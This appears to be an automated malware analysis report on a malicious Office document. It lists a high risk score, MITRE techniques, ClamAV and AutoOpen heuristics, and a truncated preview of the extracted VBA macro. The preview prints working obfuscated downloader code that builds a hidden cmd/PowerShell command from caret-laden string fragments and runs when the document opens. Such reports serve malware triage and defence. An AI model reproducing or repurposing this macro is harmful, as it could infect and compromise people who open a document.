Risk Score: 142 (MALICIOUS)
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro attempts to construct and execute a PowerShell command, likely to download and execute a second-stage payload. The ClamAV detection name 'Doc.Downloader.Valyria-6665587-0' further supports this downloader behavior. The AutoOpen macro indicates it will execute automatically upon opening.
Heuristics (5)

- ClamAV: Doc.Downloader.Valyria-6665587-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Valyria-6665587-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44656 bytes |

SHA-256: 40b0b07bc7da0e2c7904f9b8f2b691660e7f2338a51777de888dd99ad49c9558
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "HMQYWlKi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lHjrUoaS"
Function YLRWtFl()
On Error Resume Next
IsArray CDate(OBqQBV - vwBoSo)
VKnsP = jNUCF - GzIwdK * uILnN + iVkjl
IsArray Sqr(NijkS)
VarType LCase(22305 * sXaAn / GIakYk / zFPihb)
JWnPFpPBYbP = "md" + " " + "/v^:" + "O/c " + CStr(Chr(AZFWNzKIbEC + kmwivNvKmPatz + 34 + iEMNYiD + KwuRwjfh)) + " s^E" + "^t " + " ^ " + "^4^I^" + "u^m^=p^" + "ow)x^" + "s^h)^l" + "^l"
VarType Log(4)
jQmUiAfmmT = "^ " + "-)^ ^" + "[^A" + "?^[^A" + "^+oA" + "cA^A9" + "^A^" + "+^4A^" + "ZQ" + "?3" + "^AC^0^A"
VKnsP = MZsJI + hSYLb
aWjna = "^bw?^" + "iA" + "+^o^A" + "^ZQ^?j^" + "A^H^Q^A" + "^I^" + "A?^O^A" + "^+UAd" + "AA" + "u^A" + "'c^AZQ^"
VarType hKLqwO - zVRCR / 25307 * oMqtj
VarType Tan(bpTbNX)
VarType Int(AEfpiw)
IdHMzZBSu = "?^i" + "A^EM^" + "AbA?p" + "A+^U^Ab" + "g?0^"
VKnsP = Oct(82734 / 19718)
VKnsP = 57875 - owrmk
VarType Sqr(moizDq)
VarType CDec(3266)
IsArray Hex(7028)
iKozGM = "AD^s" + "A[A^?" + "^" + "M^AHo^A" + "^Z^gA^" + "9^A"
VKnsP = CDec(uLVMB)
kUfAjpfs = "C" + "c" + "^A^\A" + "^?0A" + "^HQ^A" + "c^A^A^"
VarType Str(59989 * lXYtC + 95065 + pTMscI)
IsArray Hex(3)
VarType 4111 / QQIpa
VKnsP = Str(kvXWT)
VarType Second(nSItk)
KEanfHfbd = ",^AC" + "^" + "8AL^w^" + "?z^A+E" + "^" + "A" + "b^g?vAC" + "4^A^\" + "^Q" + "^?^" + "]^AC^" + "8^A"
VarType MiPYu + VLiAr - wfbIR - YqwEKY
IsArray uXWTX + nCjDad + 65604 * RqpSZX
MwXQhj = "(^" + "A?^`A+I" + "A^\^g" + "^?^ZAD" + "M^" + "Ab" + "^g?A^A" + "+"
VarType TimeValue(253183858)
IsArray CBool(558)
IsArray Second(jdULI / VLrEwj)
fNYIbMQkWaF = "^g^Ad" + "^A" + "?0A^H^A" + "^" + "A^" + "Og" + "A" + "vAC" + "8" + "A^Z^"
YLRWtFl = JWnPFpPBYbP + jQmUiAfmmT + aWjna + IdHMzZBSu + iKozGM + kUfAjpfs + KEanfHfbd + MwXQhj + fNYIbMQkWaF
VKnsP = CDate(14519 / qWqzp / JojZdU * 68430)
VarType 50642 / 72586
VarType 85356 / PhBjzq
End Function
Function pzijAUz()
On Error Resume Next
IsArray Oct(94)
rJTDM = "w?]" + "AH^U" + "^A)^g" + "^" + "?" + "v^" + "A^+^w" + "A^" + "d^Q" + "?^iA" + "C^4Ac^"
VKnsP = CDbl(9)
VarType Sqr(ikmcLT)
IaofrC = "g?" + "1^A" + "C" + "^8^AM^w" + "^?QAH" + "^IA\^Q" + "^?^UA^'" + "^`^AQA" + "^?"
IsArray Val(ZjlQL / rNzQnO - kcwAlT + wwLpan)
VarType cJssD + 45380 - csnsn + lCAOS
IsArray Oct(hdLhCc / DtfdYk)
PrGtnqWztjj = "o^AH^Q" + "AdA" + "?^wA^D" + "o^A^L" + "w" + "Av^" + "A^" + "+YAb^" + "w?]^A" + "+U^A)A"
VKnsP = KUCZY + UdBTmq
VarType QONkT + jcmQE
LpKjzHJDK = "?" + "^0AH" + "^I^AY" + "Q?^`A" + "^+^`A^b" + "^g" + "^?nA+^"
VKnsP = paHITz - huimu / 51839 - DrQih
VKnsP = Str(1)
IsArray 39495 + BzhLv
VarType Hex(2975)
VarType Oct(pXfIAp)
tARnhVQERrj = "Y" + "^Acg?^" + "4^A" + "C^" + "4" + "Abw?^]^" + "A^+" + "cA" + "^Lw"
VKnsP = Month(VUiYJ)
IsArray Month(18492 / dUjKf + aUcUos - IOwUQ)
wDSsRwb = "?^mAD^Y" + "^A^WQ^" + "?" + "^]^A" + "^+`^" + "A^"
VarType nWZMSR * wotiGO
jVfvlLjiiq = "QA^?" + "o^A^H^Q" + "A^d^A" + "^" + "?w^A^D" + "o^AL^w^" + "Av^A+^E" + "^A^bA?" + "^]A+UAY" + "Q^?`^A^" + "H`A\^" + "A^?v"
VKnsP = CDate(1)
GzKwcPUFB = "^A^" + "HM" + "^A^d^" + "A^A^u" + "^A" + "^+`Ad" + "^A^?oA+" + "`A^bg" + "?" + "#^A" + "C" + "^4^A^b" + "^g^?"
VarType Log(FBwKm)
IsArray CDec(XEvGWY)
VKnsP = MZNjbT - uNFfDt / 12835 / iqwKz
IsArray Log(zXobJ)
FlSHPV = "lAH" + "^Q^A" + "LwA^#^" + "A^+^" + "IA^W" + "^g^?" + "^" + "A^A" + "+^gAdA?"
IsArray CStr(89)
VarType Int(kAYGj)
VarType 28348 / MRoZpu / 77 + EmHDj
GLqUTGKB = "0" + "AH^AA^" + "O" + "^g^AvAC" + "^8^A" + "^ZQ?^2" + "A+" + "8" + "A^L" + "^g" + "?nA" + "+^U" + "A^Lw?(^"
pzijAUz = rJTDM + IaofrC + PrGtnqWztjj + LpKjzHJDK + tARnhVQERrj + wDSsRwb + jVfvlLjiiq + GzKwcPUFB + FlSHPV + GLqUTGKB
VKnsP = TypeName(HDalfY)
IsArray Fix(3300)
VKnsP = CDbl(wUDJ ... (truncated)
```